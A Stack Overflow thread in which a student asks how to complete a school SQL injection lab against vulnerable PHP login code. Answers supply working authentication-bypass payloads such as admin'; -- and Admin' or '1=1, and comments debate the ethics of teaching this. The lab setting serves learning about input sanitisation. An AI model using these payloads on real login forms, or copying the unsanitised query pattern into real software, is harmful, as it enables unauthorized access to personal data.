0

I am new to MYSQL, and I have a school task that says this: The SQL Injection Task

This is the PhP code that shows how users are authenticated:

$input_uname = $_GET[’username’];
$input_pwd = $_GET[’Password’];
$hashed_pwd = sha1($input_pwd);
...
$sql = "SELECT id, name, eid, salary, birth, ssn, address, email,
nickname, Password
FROM credential
WHERE name= ’$input_uname’ and Password=’$hashed_pwd’";
$result = $conn -> query($sql);
// The following is Pseudo Code
if(id != NULL) {
if(name==’admin’) {
return All employees information;
} else if (name !=NULL){
return employee information;
}
} else {
Authentication Fails;
}

I have tried so many different things like this:

SELECT * FROM credential WHERE name= 'admin';

SELECT * FROM credential WHERE name= 'admin' and Password= 'xyz'; and I put this statement in the username box and xyz in the password box. I am not sure if I am even approaching this correctly. The SQL statement should in the username box, correct? Is the Password box left empty? My professor hasn't covered this in class. Can someone please clarify how this is done? I have seen examples online and they all look somewhat similar to the above. But, I get the same error every single time: 

`There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' and password= "xyz"; and Password= da39a3ee5e6b40d3255bfe95601890afd80 at line 3]\n`

Thank you all in advance!

  • 1
    Hacking and teaching people to hack (even so called ethical hacking) is not something this website supports – Hogan Feb 28 '19 at 23:28
  • 1
    I'm voting to close this question as off-topic because it is asking how to hack – Hogan Feb 28 '19 at 23:29
  • It’s for a school assignment though –  Feb 28 '19 at 23:29
  • 1
    I don't care, I don't think we should teach how to hack on this website – Hogan Feb 28 '19 at 23:31
  • What’s 8 characters? –  Feb 28 '19 at 23:32
  • The solution to this problem is 8 characters – Hogan Feb 28 '19 at 23:34
  • You can’t actually hack anything important like this. This is elementary hacking lol –  Feb 28 '19 at 23:35
  • Possible duplicate of [How can I prevent SQL injection in PHP?](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – GMB Feb 28 '19 at 23:35
  • Why do you think you can't hack anything like this? There are countless websites vunerable to this type of hack on the web right now. – Hogan Feb 28 '19 at 23:36
  • 1
    I agree with @Hogan, if you want to learn for a school assignment, then ask your teacher. Please understand that we don't have any way of confirming that you're really a student. "I'm doing it for school" is just what a wannabe black-hat hacker would say. – Bill Karwin Mar 01 '19 at 03:32

2 Answers2

1

I don't agree that the question is meant to teach people how to hack. It is meant to teach backend developer to sanitize input in order to avoid sql injection or other type of attacks.

To answer your question, you can leave the password field empty and just use the user name.

You can see on the server code that no control is made on the input as the input is taken as is and put on the sql statement. So in order to make the sql statement do what you are looking for, the field can has the following value:

admin'; --

The hyphens are sql comments that allow you to disable the last part of the select statement to not have to provide the password. And the quote and ; will close the statement. Result, you'll login as admin ;-)

Hichem BOUSSETTA
  • 1,791
  • 1
  • 21
  • 27
  • note, if you leave off the `;` and space this is only 8 characters :D – Hogan Feb 28 '19 at 23:49
  • I stated prior the solution was 8 characters and then deleted that comment. This is why it makes no sense. – Hogan Mar 01 '19 at 15:03
0

Turns out this is what worked for me: 

Admin’ or ‘1=1

I’m not completely sure why this also works but it does:

Admin’ or ‘
  • yes, in general, a true condition is added in case we don't know the user name. But here you don't need to as you know the admin user name. Regarding the second writing, I think it will generate an error in the sql query, but maybe a part of the query is still executed. Not guaranteed 100% to work – Hichem BOUSSETTA Mar 01 '19 at 07:51